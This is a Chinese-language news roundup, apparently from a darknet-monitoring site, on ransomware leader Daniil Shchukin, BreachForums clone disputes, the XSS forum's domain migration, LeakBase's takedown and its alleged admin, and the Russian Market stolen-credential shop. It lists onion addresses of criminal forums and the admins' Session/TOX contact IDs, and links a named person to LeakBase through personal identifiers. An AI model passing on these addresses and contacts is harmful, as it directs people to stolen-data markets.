德国联邦刑事警察局(BKA)近期发布重磅消息,正式公开了长期隐藏在幕后的俄罗斯勒索软件巨头“UNKN”的真实身份。31岁的Daniil Shchukin被指控在2019年至2021年间策划了至少130起针对德国企业的计算机破坏与勒索行动。作为两个暗网勒索软件团伙GandCrab和REvil的灵魂人物,他不仅开创了“双重勒索”(Double Extortion)这一流毒无穷的商业模式,更带领团队在短短几年内敛财数十亿美元。
德国卡尔斯鲁厄检察院(网络犯罪中心)和巴登-符腾堡州刑事警察局称:
丹尼尔·马克西莫维奇·舒金因涉嫌组织多起针对企业、公共机构和其他组织的有组织商业勒索软件勒索案而被国际通缉。至少从2019年初到2021年7月,他与其他同伙领导着全球最大的勒索软件团伙之一——GandCrab/REvil。犯罪分子索要巨额赎金以解密数据并阻止数据泄露。在某些情况下,他们还会大规模入侵数据,并威胁称,如果未支付赎金,就会将数据公之于众。
此次德国警方的“开盒”行动,不仅是法律层面的追责,更是对俄罗斯勒索软件避风港的一次有力反击。虽然Shchukin和同伙Kravchuk目前极有可能仍潜伏在俄罗斯境内,甚至可能受到了某种程度的“默许保护”,但BKA的这份通缉令意味着他们已彻底失去了在全球范围内洗钱和出行的自由。
UNKN是一位现年31岁的俄罗斯黑客,也是双重勒索的鼻祖 在网络安全界,“UNKN”(也称Unknown)曾是一个令人闻风丧胆的代号。他是俄罗斯勒索软件生态系统中最具影响力的核心人物之一。然而,根据BKA官方通缉页面披露的细节,这位曾不可一世的黑客真名叫作Daniil Maksimovich Shchukin(丹尼尔·马克西莫维奇·舒金),现年31岁。
德国警方调查发现,Shchukin与其43岁的同伙乌克兰裔俄罗斯公民Anatoly Sergeevitsch Kravchuk,在2019年到2021年这三年的黄金作案期内,犯有130项有组织商业勒索罪,通过精心设计的网络攻击,仅通过25起案件就直接敲诈了近200万欧元的赎金。但这只是“冰山一角”,据BKA估算,仅在德国境内,他们造成的直接经济损失就超过了3540万欧元,受害者涵盖了大量中型企业和公共机构。
如果要问Shchukin对勒索行业最大的“贡献”是什么,那无疑是他首创的“双重勒索”策略。
在早期的勒索软件时代,黑客只是单纯加密受害者的文件,受害者付钱拿密钥。但随着备份技术的普及,很多企业选择拒绝交钱。而UNKN领导的团队改变了逻辑:在加密之前,他们会先利用脚本静默窃取受害者的机密数据(Exfiltration)。
这意味着,即使你有备份,如果你不付钱,他们就会在名为“HappyBlog”的泄露站点上公开你的商业秘密和员工个人隐私。这种“不交钱就社死”的手段,直接将勒索的成功率提升到了一个新的维度。
勒索从未停歇,从GandCrab过渡到REvil 暗网勒索软件团伙GandCrab最早于2018年初出现,最初通过包含恶意附件的垃圾邮件传播。GandCrab在2019年宣布“金盆洗手”时,曾嚣张地宣称他们已经勒索了超过20亿美元。但这只不过是一次拙劣的品牌重塑(Rebranding)。
GandCrab消失后不久,REvil(又名Sodinokibi)便以几乎相同的底层代码架构高调亮相。REvil迅速成为全球最具攻击性的勒索软件组织之一,并在2021年被瓦解。其受害者包括Lady Gaga的律师事务所、美国总统唐纳德·特朗普等知名人士以及美国软件提供商Kaseya等大型公司。
Shchukin被认为是这两个组织的共同头目。他通过RaaS(Ransomware-as-a-Service,勒索软件即服务)模式,将网络攻击规模化。他提供恶意软件平台,招募全球的“盟友”(Affiliates)去入侵企业,最后双方按比例瓜分赃款。这种模式直接降低了技术门槛,导致2020年左右全球勒索攻击频率呈指数级上升。
从2019年至2021年那段疯狂的时期,这两人利用复杂的混淆技术(Obfuscation)和加密货币洗钱网络躲避追踪。2022年,俄罗斯联邦安全局(FSB)宣布逮捕了14名涉嫌REvil成员,但此案的法律程序进展缓慢。仅有8名嫌疑人在莫斯科出庭,面临与非法金融交易相关的指控,而庭审也多次延期。2024年,Sodinokibi/REvil的关联黑客24岁的乌克兰公民雅罗斯拉夫·瓦辛斯基(Yaroslav Vasinskyi,又名Rabotnik)因参与7亿美元勒索软件计划而被美国判刑。
如今,随着多国执法机构的协作,这些曾经的数字幽灵正在逐一显形。在此,“暗网下/AWX”告诫勒索软件团伙:在网络安全世界里,没有永远的匿名与隐身。无论使用了多么复杂的代理、VPN或者加密手段,只要在物理世界留下了痕迹,天网恢恢,疏而不漏,正义的审判迟早会到来。
BreachForums论坛是一个为黑客及网络犯罪分子提供买卖被入侵数据库、黑客工具以及分享网络犯罪知识的暗网平台。与BreachForums论坛相关的各种戏剧性事件层出不穷,而且愈演愈烈。尽管屡遭执法部门的打击,偶尔还会发生内部冲突,但专注于买卖数据泄露的论坛仍然不断涌现。
“暗网下/AWX”梳理了近期Indra的BreachForums的变迁,在其关闭BreachForums之后,BreachForums[.]sb经过了几轮变化,先是被@Caine持有并继续运营,之后该论坛的管理团队集体退出。后明网域名BreachForums[.]as与BreachForums[.]sb被DarkForums的Knox买走,而据称是冒牌的Shinyhunters又开设了一个新明网域名BreachForums[.]ai来运营新版本的BreachForums。
Indra的BreachForums的工作人员集体辞职 @paw(@pine)在BreachForums[.]sb发布公开声明表示,BreachForums[.]sb的6名工作人员(@pine、@Loki、@888、@Tanaka、@paw、@Addka72424)已辞职,并声明:“请勿信任任何新出现的或现有的克隆站点,BreachForums这个名字已经不复存在,且永远不会回归。”
对此,在Telegram上假冒Shinyhunters的管理员@Caine声称,旧论坛的工作人员退出,是因为“勒索”。这些版主要求以1000美元的门罗币作为报酬,以补偿他们所做的一切工作。在被他拒绝后,他们选择了离开。而论坛将会组建新的工作人员团队。
BreachForums[.]as与BreachForums[.]sb显示了新的提示信息 “暗网下/AWX”尝试访问BreachForums[.]as与BreachForums[.]sb这两个明网域名,两个网站均显示相同的界面UI风格,一眼可以看出显然属于同一个所有者。
BreachForums[.]as网站展示了BreachForums[.]sb的明网域名与暗网域名:
BreachForums[.]sb则称,BreachForums现已完全由Knox(knox.hn)掌控。所有数据(包括最新的数据库和源代码)均已得到妥善保管。不再有混乱和诈骗,不再有不确定性——一切现已实现集中管理。请勿信任任何克隆站点。并提供了Telegram联系方式。
上周重启的一个新BreachForums论坛 周一,一名自称是勒索组织ShinyHunters成员的人宣布重启运营一个新的的BreachForums论坛(BreachForums[.]ai)。但一位与ShinyHunters官方频道有关联的人士表示,该组织与BreachForums的任何重启都毫无关系。他们表示:“我们与那个论坛没有任何关系。自从2025年10月10日被FBI查封后,我们就再也没有重启过它。”
本周重启的BreachForums论坛是“暗网下/AWX”前期介绍的Indra的BreachForums论坛的延续,上个月,Indra的BreachForums论坛的“基础设施,包括完整的数据库和源代码”,被“直接从其托管服务器”黑客入侵,并以1万美元的价格出售。新BreachForums论坛管理员(化名“x”)表示,前任管理员“N/A”得知此事后“惊慌失措,带走了能带走的东西,然后立即离开,没有通知社区”,之后“数据库就落入了不明人士手中”。
这一惊慌失措的说法似乎指的是3月16日发布在论坛旧版本上的一条公告,该公告宣布“BreachForums已死”,并正在寻找新的管理团队。公告表示:“我们现在正在寻找一位负责任的个人或团体,愿意接管论坛的领导权并继续提供支持。”
除了ShinyHunters的官方否认之外,安全研究人员还详细列举了“x”的说法中的矛盾之处,暗示其内容不实,并表示一些合法的BreachForums前运营者似乎正在注册多个BreachForums域名,以阻止类似的重启声明出现。
ShinyHunters表示,此次重启是利用先前泄露的数据发起的一系列BreachForum虚假论坛中的最新一起。该组织的一名成员说道:“其他威胁行为者能够恢复一个外观相似的合法论坛,包括重新导入旧用户数据,其中也包括我自己的ShinyHunters账户。”
IntelOpsV3称冒牌SH推出的BreachForums论坛又是一个冒牌货 暗网情报研究者@IntelOpsV3称,在Indra关闭其BreachForums并实施“卷款跑路”的时候,一个冒牌的SH(Shinyhunters)带着另一个冒牌的BreachForums(BreachForums[.]ai)出现了。于是,几乎在同一时间,至少有3个一模一样的网站,都声称自己是真正的BF。但不知道这些所谓BreachForums能运营多久。
新BreachForums论坛使用了暗网域名:http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd[.]onion
@IntelOpsV3提醒,其正在密切关注所有新的BF克隆站点,请谨慎对待所有这些新克隆站点。因为原BreachForums的PGP密钥、网站代码和数据库都已泄露,是时候让Breachforums这个名字长眠了。
@IntelOpsV3称,这是新的BF团队,可以看到他们在TG上假扮成“Shinyhunters”,他们声称自己是唯一的正宗BF,他们还发布了一则警告,称其他克隆站点均为假冒。这个新冒出的BreachForums克隆站点由doxeur、kiroshell和breach3d所有。breach3d就是那个发布假Dell数据库的冒牌Shinyhunters。
但可惜的是,SLSH已经发布了BFv5数据库,并指认他们是冒牌货。真正的SLSH称:“目前所有的论坛都是假的 [ .sb .ac .fi .bf .us 等],如果它们继续存在,我们将泄露所有BF的备份。因为我们掌握了所有MyBB 1.8版本的漏洞利用代码。”
@IntelOpsV3称,这个论坛是假的。这个论坛的ShinyHunters是个冒牌货。他们冒充IntelOps、Pine、Loki等组织,正如你们从我们的推特帖子中看到的,这个论坛里充斥着各种角色扮演。
BreachForums[.]ai的管理员“x”发布公告驳斥@IntelOpsV3 BreachForums[.]ai的管理员“x”于4月2日发布公告进行回应,并澄清该论坛的现状。“x”表示,他们没有导入旧BreachForums的SQL数据库,并不意味着他们是蜜罐(honeypot)或退出骗局(exit scam)。他自称这是一个全新的开始,这是BreachForums的官方延续。并请大家在做出假设前,先进行适当的研究,不要基于不完整的信息下结论。
公告表示,他们理解大家的怀疑,但事实不会改变。一旦论坛完全开发并稳定下来,他们将对克隆站点采取行动。“x”称,一些来源(如 Twitter 上的 IntelOps (@intelopsv3))散布了虚假信息,声称其是退出骗局。这些说法是错误的。IntelOps有历史性地不经查证就发布信息,并经常误报或歪曲细节。
“x”称,他们鼓励大家保持信息灵通、核查事实,并避免匆忙下结论。他们不是蜜罐/退出骗局。
公告表示,如果是蜜罐,他们会尝试修改MyBB源代码来尽可能记录用户的信息。相反,他们移除了IP记录,并用自定义构建的垃圾邮件预防系统取而代之。即使FBI或任何执法机构查封后端服务器也找不到任何有用的东西。
“x”宣称自己的VPS是完全加密的,用户的隐私是优先事项。
SLSH冒牌者究竟是谁 独立安全研究人员Ryan Moran(@rmoskovy)表示,在对这位自称“ShinyHunters”冒牌者进行分析时,我使用一个假账号通过Telegram向其发送消息,声称需要向“Rey”(一名与SH/SLSH有关联的威胁行为者)偿还一大笔钱,并要求对方提供“Rey”的联系方式。
然而,对方非但没有提供“Rey”的联系方式,反而要求@rmoskovy直接向其汇款。当进一步追问时,对方发来了一个拼写错误的账号,该账号是“Rey”真实用户名的拼写变体:
2026-02-26 -> Qilin 2026-02-26 -> Rey 2026-02-20 -> Qiliin 2026-01-24 -> XiaoBtc ( MBTC ) 2025-12-24 -> MBTC 2025-12-24 -> Crimesite 2025-11-08 -> Bjorka 2025-11-04 -> NinjaBoi6890 2025-10-31 -> SkyHunters 2025-10-25 -> Asley 2025-09-10 -> Kimbo 2025-06-09 -> Bebale Office 2025-05-15 -> Lesley
最近几天,网络安全圈和暗网监控平台纷纷爆出猛料,长年盘踞在俄罗斯网络犯罪头部的XSS论坛(原xss[.]is)在被国际联合执法行动打击数月后,正在开始一场大规模的基础设施迁移。暗网监控账户Daily Dark Web和Dark Web Informer相继在社交媒体X上发布预警,指出臭名昭著的俄罗斯暗网论坛XSS已经开始引导用户访问其新明网域名XSS[.]ac,并同步更换了暗网域名。
作为一个从2013年就开始活跃的老牌社区,XSS的前身是著名的 DaMaGeLaB。根据维基百科XSS.is条目的介绍,它不仅是黑客们交流漏洞、买卖 0-day 的地方,更是勒索软件(Ransomware)开发者寻找合作伙伴、招募分销商的核心枢纽。
2025年7月,“暗网下/AWX”曾经报道,法国警方与乌克兰同行和欧洲刑警组织合作逮捕了XSS[.]is的其中一名主要管理员,并查封XSS[.]is主域名。然而,执法行动并没有摧毁XSS[.]is包括服务器在内的基础设施,其在俄罗斯的庇护下依然活着,备用明网域名XSS[.]as与.onion网站依然可以访问。
基础设施迁移背后的技术博弈 在被执法机构打击后,在过去的几个月里,XSS论坛的基础设施一直处于不稳定的状态,XSS论坛的管理员一直在试图优化其反爬虫和反 DDoS(分布式拒绝服务攻击)策略。
正如“暗网下/AWX”曾介绍,XSS论坛在被警方打击后,虽然XSS[.]is域名显示了查封通知,但备用明网域名xss[.]as、.onion网站(xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid[.]onion)和位于thesecure[.]biz的Jabber服务仍在线运行。对于这种级别的网络犯罪枢纽,保护后端数据库的安全性是重中之重,因为后端基础设施被警方掌握,所有未加密的私信和交易记录都可能成为抓捕黑客的铁证。
更换全新的明网域名、暗网域名,也许是为了保护后端基础设施的安全,这反映了网络犯罪团伙为维持韧性并规避干扰所做的持续努力。
经本站(anwangxia.com)测试,目前,其原先的明网域名XSS[.]as、暗网域名(xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid[.]onion)均无法正常访问,仅可使用全新域名进行访问。
经查询Whois信息,新的明网域名XSS[.]ac注册于2016年3月10日,ac域名是英国海外领土阿森松岛的顶级域名(TLD)后缀。目前, 新明网域名XSS[.]ac使用了云服务商Cloudflare的解析中转服务。新的暗网域名几乎同一时间推出,域名为:https://xssac4uqtauxumkktnp3knz2ag7qcb3efmb66mokjg5fcqhzvilgwfid[.]onion
XSS未来能否继续活在俄罗斯的庇护下 虽然XSS试图通过更换域名来“续命”,但现实情况并不乐观。随着国际执法合作的加强,尤其是针对暗网基础设施的协同打击,这类论坛的生存空间正在被极限压缩。尽管有传言XSS论坛在俄罗斯的庇护下才能发展如此壮大,但有Leakbase的前车之鉴在,也许俄罗斯该打击还是要打击。
另外,在黑客圈子里,信任是比比特币更珍贵的货币。频繁的宕机、域名的临时变更,以及关于管理员可能被“渗透”的传言,正在让XSS的核心用户流向其他新兴平台,比如DamageLib。如果XSS无法证明其新域名的安全性,或者在基础设施管理上继续表现出疲态,这个曾经的“黑客圣地”很可能会步其前辈的后尘,最终走向崩塌。
更多暗网新闻动态,请关注“暗网下/AWX”。
在美国和欧洲执法机构对大型在线数据交易平台LeakBase进行全球执法打击数周后,俄罗斯执法部门逮捕了LeakBase的一名管理员。
俄罗斯内政部周三表示,俄罗斯内务部安全局官员与罗斯托夫州警方合作,逮捕了南部城市塔甘罗格的一名居民,该居民涉嫌创建并运营着一个规模庞大的国际黑客平台。在长达四年的时间里,该平台被用于交易被盗的个人信息数据库。在搜查被拘留者的住所时,查获了电脑设备和其他具有证据价值的物品。
俄罗斯内务部发言人伊琳娜·沃尔克表示:“根据现有信息,该平台托管了数亿条被盗用户记录、银行信息、登录名和密码,以及通过黑客攻击获取的公司文件。超过14.7万名在该论坛注册的用户能够买卖这些数据,甚至利用这些数据对公民实施诈骗。”她补充道:”俄罗斯内务部莫斯科总局侦查总局的一名侦查员已根据俄罗斯刑法第272.1条第3款和第6款立案调查。被告已被还押候审。“
俄罗斯内务部发言人伊琳娜·沃尔克没有透露该平台的名称,但俄罗斯国家通讯社塔斯社援引执法部门消息人士的话称,该平台名为LeakBase。该通讯社的消息人士称,这名被拘留的塔甘罗格居民涉嫌运营“最大的国际黑客平台之一LeakBase”。
俄罗斯联邦司法部公布的视频显示,俄罗斯执法人员在嫌疑人汽车附近将其拘留,并在一个车库内对其进行讯问,车库内存放着据称与此次行动有关的电脑硬件。
目前尚不清楚俄罗斯当局是否与西方执法部门协调了此次逮捕行动。在莫斯科于2022年入侵乌克兰后,欧洲刑警组织暂停了与俄罗斯的合作。
LeakBase网络犯罪论坛已运行4年 LeakBase于2021年上线(但直到2023年3月才火起来),是一个基于订阅的网络犯罪数据库交易平台,已成为网络犯罪生态系统中的关键枢纽,专门交易泄露的数据库和包含被信息窃取恶意软件窃取的凭证的“窃取日志”。该论坛以英语公开运营,集市场和讨论功能于一体,允许网络犯罪分子买卖和交换包含被盗凭证、个人信息和其他敏感记录的数据库的权限,一些会员甚至花费数百美元购买了该平台的高级访问权限。
该论坛上发布的许多数据都是通过非法入侵政府系统和美国公司获得的。据欧洲刑警组织称,该论坛的一项内部规则禁止出售或发布与俄罗斯有关的数据。
LeakBase于本月初被查封 3月初,美国联邦调查局查封了网络犯罪论坛LeakBase,此次行动是“泄密行动”(Operation Leak)的一部分,这是一项由欧洲刑警组织协调的国际行动,来自14个国家的执法机构参与其中,全球执法机构开展了协同行动,包括逮捕、搜查住所。据美国当局称,联邦调查局与欧洲合作伙伴合作,在十几个国家对45名嫌疑人实施了100多项执法行动。
此次行动查封了该论坛使用的多个域名,并关闭了位于荷兰和马来西亚等国的托管基础设施。作为打击行动的一部分,当局将该网站的域名重定向到由美国联邦调查局控制的服务器。
欧洲刑警组织通过绘制论坛基础设施图、分析用户活动、跨国关联嫌疑人、受害者和证据,为此次行动提供了支持。位于海牙的欧洲刑警组织总部专家审查了缴获的数据,并生成了调查线索。此次行动在联合网络犯罪行动工作组的框架下进行,同时,联合指挥所负责协调全球行动期间的实时情报共享。
当局查获了LeakBase数据库,使得调查人员得以揭露多名自以为匿名的用户的真实身份。警方还通过犯罪分子常用的网络渠道联系了嫌疑人,明确警告他们网络匿名是有限的。调查人员仍在追踪数字证据,以识别其他犯罪分子。此次行动也凸显了数据泄露事件中被盗数据经常出现在网络犯罪论坛上,并助长诈骗、身份盗窃、账户盗用和网络钓鱼等犯罪活动,从而强调了强密码和多因素身份验证的重要性。
LeakBase管理员被俄罗斯警方锁定 威胁情报研究人员表示,一个使用Chucky、beakdaz、Chuckies和Sqlrip等网络化名的威胁行为者是LeakBase网站背后的管理员。在论坛被关闭后发布的报告中,KELA和TriTrace Investigations将Chucky与一名来自塔甘罗格的33岁男子联系起来。颇具讽刺意味的是,这位“世界最大规模之一”的泄露数据论坛管理员,似乎完全没有考虑过自身的匿名性。
研究人员表示,为了推广这个新论坛,其创建者Chucky亲手发布了已在其他网站上公开的泄露数据。其目的是推广该论坛,并将其打造成黑客的交易平台。自LeakBase成立以来,该论坛共发布了超过1.6万个数据库。
在LeakBase网站被国际执法行动查封几天后,LeakBase恢复了上线,域名为“leakbase[.]bz”,并由DDoS-Guard提供DDoS防护。而DDoS-Guard是一家俄罗斯的防弹(高防护)主机服务提供商,俄罗斯警方可以很容易通过DDoS-Guard或者其他支付方式锁定其管理员。
现在,访问LeakBase网站的用户会看到这样一条消息:“在俄罗斯内务部特别技术事件局的一次特别行动中,LeakBase 论坛已被永久关闭。在计算机信息领域从事非法活动,以及侵犯个人和公民的宪法权利和自由,均将根据俄罗斯法律承担刑事责任。”
情报人员的分析 情报研究人员表示,俄罗斯黑客的首要规则是:“别在俄罗斯境内搞事”。也就是说,别从俄罗斯人那里偷钱——这样俄罗斯联邦安全局(FSB)就不会找你麻烦。LeakBase也不例外。该论坛禁止出售与俄罗斯相关的数据库。
LeakBase的管理员兼创始人使用“Chucky”这个昵称——以此致敬同名恐怖电影系列中那只杀人玩偶。他从未隐瞒自己的国籍:在自己的论坛上,Chucky一直公开使用俄语交流。在LeakBase的联系方式栏中,Chucky留下了他的Telegram账号——@chuckybhf。该账号注册于来自塔甘罗格的33岁阿列克谢·库丘莫夫名下。
阿列克谢·库丘莫夫在网络上留下了大量的数字足迹,其中几乎每一条记录都指向他与Chucky的关联。例如,他的主要邮箱是[email protected]——也就是说,该邮箱既包含他的“黑客”化名,又注册在苹果公司名下。此前,阿列克谢·库丘莫夫曾使用[email protected]这一邮箱。在暗网网站 Doxbin 的用户信息泄露中,该邮箱与用户Beakdaz相关联。这是Chucky的旧昵称,十多年前他正是以此开启了暗网生涯。
库丘莫夫曾多次使用与这些昵称关联的邮箱购买SIM卡、支付主机费用,以及在其他需要提供护照信息的情况下。讽刺的是,Chucky从事泄露数据库的交易——他比任何人都更清楚,在俄罗斯数据泄露是家常便饭。
几年前,库丘莫夫在VK主页的“灵感”一栏中写下了“Darknet”。而通过其“黑客”账号@chuckybhf,库丘莫夫会阅读Telegram频道“塔甘罗格突发事件”的评论。此外,库丘莫夫还利用LeakBase上公开的Skype账号,通过该网站使用俄罗斯Plati卡购买电子游戏。
西方分析师的结论间接证实了阿列克谢·库丘莫夫就是Chucky。他们虽未透露Chucky的真实姓名,但指出了他与昵称Beakdaz的关联,以及可能位于塔甘罗格的所在地。
根据泄露信息显示,库丘莫夫从未出过国。如果他继续保持这种状态,那么这位前LeakBase管理员极有可能不会被捕。
本月初,“暗网下/AWX”曾报道,两个版本BreachForums论坛的多个明网域名遭执法机构查封。本月中旬,由Indra运营的暗网数据泄露论坛BreachForums遭遇了长期停机,明网网站无法正常访问,暗网网站提示“Onion site not found”。前端仍正常运行,但后端已无响应,基本可以确定其背后的基础设施出现了问题,而非黑客攻击或计划内维护。
虽然BreachForums管理层表示这只是例行维护,但据威胁情报专家猜测,可能有两项协同行动针对该论坛:一是由LAPSUS$与HasanBroker共同宣布的“Operation Lebensraum”联盟,明确以“抹除Indra及其BreachForums论坛”为目标;二是“网络反情报威胁调查联盟”(CCITIC),一家调查网络威胁以协助当局的非营利组织,该组织声称是他们攻击了Indra的BreachForums。
经“暗网下/AWX”长期坚持跟进与持续跟踪报道,可以看到BreachForums数据泄露论坛有着混乱的黑暗历史:多次遭FBI查封(2023–2025年)、大规模数据泄露(2026年1月有32.4万用户信息曝光)、疑似蜜罐的重新启动、多次域名被查封后重新启用新域名……自2022年以来,BreachForums历经多次FBI查封仍存活至今,每次被关停后都会更换顶级域名(.st ➡️ .cx ➡️ .is ➡️ .vc ➡️ .hn ➡️ .as…)。
这次不管是谁的努力,瘫痪了Indra的BreachForums论坛,则为其竞争对手HasanBroker版本的BreachForums论坛铺平了道路,该版本自诩为合法继承者,且正获得越来越多的支持。
“暗网下/AWX”继续追踪分析后基本确认,Indra版本BreachForums的关闭,既非黑客攻击,也非例行维护——而是被强制下线。网络反情报威胁调查联盟(CCITIC)成功关闭了Indra的BreachForums论坛,Indra被迫发布一则告别公告,但该公告目前已经不可见。
Indra的BreachForums论坛在CCITIC的持续努力与施压下关闭 根据CCITIC官网的介绍:
网络反情报威胁调查联盟(Cyber Counter-Intelligence Threat Investigation Consortium)是当今互联互通的数字环境中,抵御不断演变的网络威胁的一座协作堡垒。
本组织汇聚了网络安全专家、研究人员和分析师,共同构建统一的防御网络。依托自主研发的平台和集体智慧,我们在威胁危及关键基础设施之前,便能对其进行识别、分析并予以消除。
CCITIC宣告, BreachForums.as已下线——CCITIC成功将其击溃。其在领英上发文称,该域名breachforums[.]as是这个臭名昭著的网络犯罪论坛在明网上的最新版本,目前无法访问。这不是系统故障,而是被强制下线。
CCITIC表示,他们已成功定位到BreachForums背后的上游服务器,这些服务器均托管于DigitalOcean(ASN 14061)位于法兰克福数据中心的机房。随后,该组织提交了多份滥用报告(由于DigitalOcean要求每个 IP 地址提交一份报告,因此不得不提交了三份完全相同的报告),美国云服务提供商DigitalOcean终止了对这些服务器的服务。
🖥️ 已确认的服务器IP:
🔹 164.90.223.186 — 与 breachforums.as 域名直接关联
🔹 138.68.73.155
🔹 68.183.223.214
CCITIC于2026年3月6日扫描时,确定这些服务器拥有相同的技术指纹:WSGIServer/0.2、CPython/3.12.12、端口 3093、TLS 1.3。
2026年3月12日,CCITIC向DigitalOcean安全运营中心提交了滥用报告后,该托管服务商审查了CCITIC的报告,并对与BreachForums基础设施(breachforums[.]as)相关的账户采取了行动。
Indra发表告别信后选择转移资金退出 随后,访问Indra的BreachForums论坛,跳转至:https://breachforums[.]as/info/download.php,并显示一封告别公告:
亲爱的世界,
是时候向大家告别了——尽管并非彻底的告别。
BreachForums 早已不仅仅是一个平台;它是一个社区,在许多方面,更是一项你们每个人都理解并为此贡献力量的共同使命。
在过去的几个月里,我竭尽所能帮助这个社区重振旗鼓并日益壮大,我坚信这里所建立的一切将会继续存在并不断发展。
然而,此刻我必须退居二线。我个人生活中一些重要且迫切的事务需要我投入精力,其中包括一项新事业的启动。尽管如此,只要条件允许,我仍会尽我所能继续支持 BreachForums。
因此,我们现正寻找一位负责任的个人或团队,接手论坛的领导工作并提供持续支持。
现任版主团队将保持不变,并继续履行其一贯职责:Loki、Tanaka、888 和 Pine。
我们期待就论坛的未来展开严肃而认真的讨论。
如有兴趣,请通过以下渠道联系管理团队:
Session: 054d67e476285098efb2bbe770d205588b6639c5af9157edf138b630cd53109723
TOX:D1E8EB300080486048B366464BD5D57C86D6FA8234E784714541BAEAFB64FC6A7CCD72D7F819
— BreachForums 管理团队
Russian Market是当今地下网络犯罪生态中最具持久性和影响力的平台之一,主要从事被盗凭证、信用卡数据(CVV)以及信息窃取恶意软件(infostealer)日志的交易。该平台自2019年左右开始运营,据称有俄罗斯政府背景,尽管名称中带有“Russian”,但该网站使用英语界面,面向全球用户。截至2026年3月,根据多家网络安全机构的监测报告(如Breachsense、CloudSek、SOCRadar、Rapid7等),Russian Market仍是stolencredentials和stealerlogs的主导市场之一,库存规模庞大,在售窃取日志超过1060万条,信用卡数据超过850万张。
与“暗网下/AWX”多次报道的其他曾被执法部门重创的平台(如Genesis Market于2023年被查封、导致Russian Market交易量激增670%;被查封的RaidForums/BreachForums、XSS等)相比,Russian Market表现出极强的韧性,未遭受平台级取缔,持续活跃。
平台运作模式与商品演变 Russian Market采用“自动商店”(autoshops)模式,类似于正规电商网站:商品分类清晰、可搜索、支持即时购买,买卖双方无需直接接触。这种低摩擦设计大幅降低了网络犯罪的准入门槛。
Russian Market平台的产品线经历了清晰的演变:
2019–2024年初:初期专注于远程桌面协议(RDP)访问权限销售。此类权限常被用于部署勒索软件、进行网络间谍活动,或作为进一步攻击的跳板。RDP访问已高度商品化,直至2024年1月该服务正式终止,不再提供。
2021年起:信用卡数据(CVV)业务迅速崛起,成为当时的主要品类之一,凭借扩张策略和较低的执法压力,一度领先同类平台。
2021年末至今:转向以信息窃取日志(stealerlogs,或称“僵尸程序”/bots)为主导。这些日志是由infostealer恶意软件从受害者设备中提取的数据包,通常包含:
保存的用户名、密码 浏览器会话cookie(可直接用于账户接管,绕过多因素认证) 自动填充数据、系统信息、加密钱包凭证等 2025年上半年,平台每月平均出售约3万个此类日志,上半年累计超过18万条公开出售。当前在售日志数量已达约1060万条,远超竞争对手(如2Easy仅为其约14%;Genesis Market关闭时仅有约42.5万个)。
主要商品详情与统计 信息窃取日志:平台最核心商品。买家可按地理位置、国家、操作系统、所用窃取工具类型、供应商、特定域名或邮箱等条件筛选。每个日志平均售价约10美元(历史价格范围1–100美元,取决于地理位置、数据质量、凭证有效性等)。日志大小通常为0.05–0.3MB,平均0.14MB,常包含多个域名的凭证。
主流窃取工具变种:Lumma Stealer曾占据主导地位(一度约66%,2024年Q4甚至达92%),但受2025年5月全球域名查封影响份额下降;Rhadamanthys(约5%)、Acreed等新兴变种崛起。早期流行的RedLine、Raccoon等因开发者被捕(RedLine2024年、Raccoon2022年相关行动),份额降至不足1%。 地理分布:美国受害者占比最高(约26%),其次阿根廷(23%)、巴西等。 部分数据存在质量问题,如重复、非唯一凭证,或虚假条目([email protected]等),但整体供应量巨大。 信用卡数据:销量第二大品类,在售约850万张。前20发卡国中,美国银行卡占比高达84%(约716.7万张)。
辅助工具:平台集成BIN验证器(根据卡号前6–8位查询卡片信息,用于筛选高价值目标);Netscape到JSONCookie转换器(将窃取的cookie转为现代浏览器兼容格式,便于实现会话劫持)。
卖家体系与生态特征 卖家采用积分评级体系,基于销量、买家反馈等计算分数。“钻石”级需超过10,000分,最高卖家分数可达20万以上。截至分析时,“窃取日志”板块仅列出约39家供应商,“信用卡”板块约557家,但许多供应商无实际商品上架。
参与者圈子相对封闭,每年仅新增一两个主要玩家。窃取工具变种也多出自同一小群体。尽管执法行动频繁,核心运营者和活跃卖家持续存在。
执法行动及其影响 自2022年以来,国际执法针对infostealer生态的打击显著加强:
2024年12月:Raccoon Stealer MaaS运营者Mark Sokolovsky被判5年监禁,导致该变种日志份额骤降。 2025年5月:微软、美国司法部、欧洲刑警组织等联合查封Lumma Stealer约2300个域名,基础设施遭受重创。 2025年11月:Operation Endgame行动关闭Rhadamanthys在226个国家/地区的超过1025台服务器,但运营者未公开被捕。 尽管如此,Russian Market平台本身未被整体取缔。竞争对手崩盘后用户迁移、平台的低调运营和快速适应能力,使其在2026年仍被多家报告视为stolencredentials和stealerlogs的主要枢纽。
风险与防御建议 Russian Market已成为凭证滥用攻击链的核心节点:企业员工设备感染infostealer→数据打包出售→买家购买用于初始访问、横向移动、勒索软件部署或账户接管。许多重大数据泄露事件最终可追溯至此类平台购买的凭证。
Russian Market的持续存在凸显了地下凭证经济的规模与韧性。其海量、低价供应降低了攻击门槛,对全球网络安全构成持久威胁。及时监控和强化身份防护,是有效降低风险的关键。
对于企业和个人,“暗网下/AWX”建议采取进一步防御措施加强防范,包括:
启用多因素身份验证(MFA),优先采用基于App或硬件密钥的方式(减少cookie劫持风险)。 使用唯一强密码,并借助密码管理器管理。 加强终端防护,部署端点检测与响应(EDR)工具,监控异常行为。 定期监测暗网暴露情报,检查组织域名、邮箱是否出现在此类平台。 开展员工安全意识培训,防范钓鱼邮件、恶意下载等感染途径。
2023年底,瑞典警方在一个小镇查获了两部手机,在分析手机数据后,警方发现了一个涉嫌贩运大量毒品的国际犯罪网络。分析人员随后发现的数据指向一个与毒品走私、洗钱和网络分销相关的全球网络,该网络主要集中在北欧国家,与历史最悠久的暗网毒品市场“Archetyp Market”密切相关。
去年6月,“暗网下/AWX”曾报道,在欧洲刑警组织和欧洲司法组织的支持下,德国、荷兰、罗马尼亚、西班牙和瑞典等六国采取了一系列大规模协同执法行动,共同捣毁了暗网毒品市场“Archetyp Market”。当时,在面临国际刑警组织的通缉令时,“Archetyp Market”的部分版主和管理员离开了欧洲。
近日,欧洲司法组织宣布,在欧洲司法组织(Eurojust)和欧洲刑警组织(Europol)的协调下,全球各地执法部门又采取后续行动导致15名嫌疑人被逮捕,一个组织严密的贩毒网络被捣毁。来自四个国家的执法部门携手合作,对这个活跃于全球的庞大犯罪网络采取了严厉打击措施。
